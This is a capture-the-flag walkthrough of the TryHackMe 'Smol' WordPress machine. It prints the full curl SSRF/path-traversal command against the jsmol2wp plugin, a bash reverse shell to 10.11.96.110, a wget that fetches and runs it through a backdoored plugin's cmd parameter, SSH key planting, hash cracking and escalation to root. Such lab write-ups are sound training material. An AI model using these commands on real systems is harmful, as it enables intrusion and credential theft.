Smol (THM)

Test your enumeration skills on this boot-to-root machine

into.

Welcome everyone Again !! today we have freshly new machine which appear to be Wordpress machine let's get right into it.

Enumeration

PORT   STATE    SERVICE REASON         VERSION
22/tcp open     ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+/gIThU4ODr/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF/gS3jP/fVw+H6Eyz/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp filtered http    no-response
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15

As you may see here we have classic SSH, HTTP. The web server will mostly run wordpress as in the machine disrecption

At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components

As an assumption i think the exploit involve some XSS and SSRF.

SSRF (Server-Side Request Forgery):

SSRF is a security vulnerability where an attacker manipulates a server to make requests to unintended locations. It can lead to unauthorized access to internal systems and sensitive data leaks.

XSS (Cross-Site Scripting):

XSS is a vulnerability where an attacker injects malicious scripts into web pages viewed by others. It allows attackers to steal cookies, session tokens, or redirect users to malicious sites.

Wpscan

Since we know its wordpress we can use wpscan a great tool for enumerate wordpress applications.

As we can see in the image my assumption was indeed correct let's try to look more into thing plugin.

Shell as www-data

So after i find this i start looking for how it maybe exploited the xss is not quite useful let's look.

advisory-archives/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt at master · sullo/advisory-archivesGitHub

This repo here explain both the SSRF and XSS. After using the SSRF we can find a creds that allow us to access the wordpress management console.

Using this command it will return us the DB creds

curl http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php\?isform\=true\&call\=getRawDataFromDatabase\&query\=php://filter/resource\=../../../../wp-config.php

Not ganna lie to you i spend much more time after i find this creds looking more because i thought this only work on the DB on the localhost. But i was mistaken once again, after a while i think, i said the ssh require public key, and when i enumerate the users .ssh file looking for the ssh i found nothing which is mostly because premissions i do not have access. So i said why do not i uses these same creds to login into the console management and it actually works.

We can also see this in the pages.

So this is intresting we can see here that it need to check from some backdoor via plugin know as "Hello Dolly" for some reason attackers love to spawn backdoor in the plugin. But do not fail in the same error as me, when i search it appear to be in a folder called "hello-dolly/hellp.php" but this is not the case it actually exist in the root directory of the plugins directory inside the wp-content directory.

So using our SSRF we can read the content of the hello.php file via this command.

curl http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php\?isform\=true\&call\=getRawDataFromDatabase\&query\=php://filter/resource\=../../../../wp-content/plugins/hello.php

so from the image above let's see what that line of code does.

so as you can see it evaluate the expression when is taking cmd pramater in the url and executed on the system. Let's exploit it.

As you can see we are able to execute commands on the server and get the results back let's make reverse shell and make some connections.

From here getting the shell is quite easy to do.

First i will prepare reverse shell and save it in ex.sh file.

#/bin/bash

bash -i >& /dev/tcp/10.11.96.110/9001 0>&1

then i will upload it into the server.

Everything after '-b' is cookies so feel free to executed directly from the browser of capture the cookies from burp suite.

 http://www.smol.thm/wp-admin/\?cmd\=wget%20http://10.11.96.110:8000/ex.sh%20-O%20/tmp/ex.sh

then we need to change the permissions or we can just use bash i did not try using bash but it should work fine. anyway i change the permissions.

http://www.smol.thm/wp-admin/\?cmd\=chmod%20777%20/tmp/ex.sh

lastly we run it. i used the browser in this step.

`

cmd=bash+%2Ftmp%2Fex.sh

And we have shell :)

Shell as diego

So once i get foothold on the system the first thing i think about is to check the database since we have the creds.

i took these passwords and save them into a file and run john on them.

after sometime john did find a password.

i test this password on the users and i found it belong to diego.

From diego's home directory we can find our first flag.

from there just to make my life easier i generate ssh key and login via ssh. and this is the process very simple.

ssh-keygen -f <username>

cat diego.pub > .ssh/authorized_keys

copy the private key into your machine with the file named diego

change the permissions of the key to 600
chmod 600 key

ssh diego@smol.thm -i key

Shell as think

after enumerate a bit i found another ssh key for the user think in his home directory.

let's do the same last three steps and login via ssh as the user think.

Shell as gege

here i was a bit tricky i really could not find it so i refers to bob's write-up and for my unfortunate luck it was very simple the problem is in how su configure we can find it in /etc/pam.d/su so we just su into gege and it will works. the unlucky part is that there is a db file in the /opt folder i check it it contain hashes so i tried to again use john to crack them because they appear to be backups so it may be different and indeed i found it as you can see in the image below but the only issue is i was trying to gege from diego which is not working it require the password if it just use think i would have been solve it. and i think this is the idea you find that you try to crack it you accidentally find it.

Smol | Writeups

Here is bob's write-up for more info

Shell as xavi

for my surprise this one was intresting so now that we have access to gege home folder we can find an old wordpress zip file when we try to unzip it , it ask for a password so i used john to crack it.

using the command 
zip2john <zipname>

we can find this.

then we just copy this into a file and crack it with john

it the same password from the db file WOW.

Shell as Root.

once we login as xavi we use sudo -l and we can see that he has sudo for everything.

from here the mission is so simple we just use sudo su and we get root shell.

Conclusion.

This machine was fun but the only issue was the shell to gege use was kinda weird and does not make sense as for the initial access and the other user was quite fun good machine overall.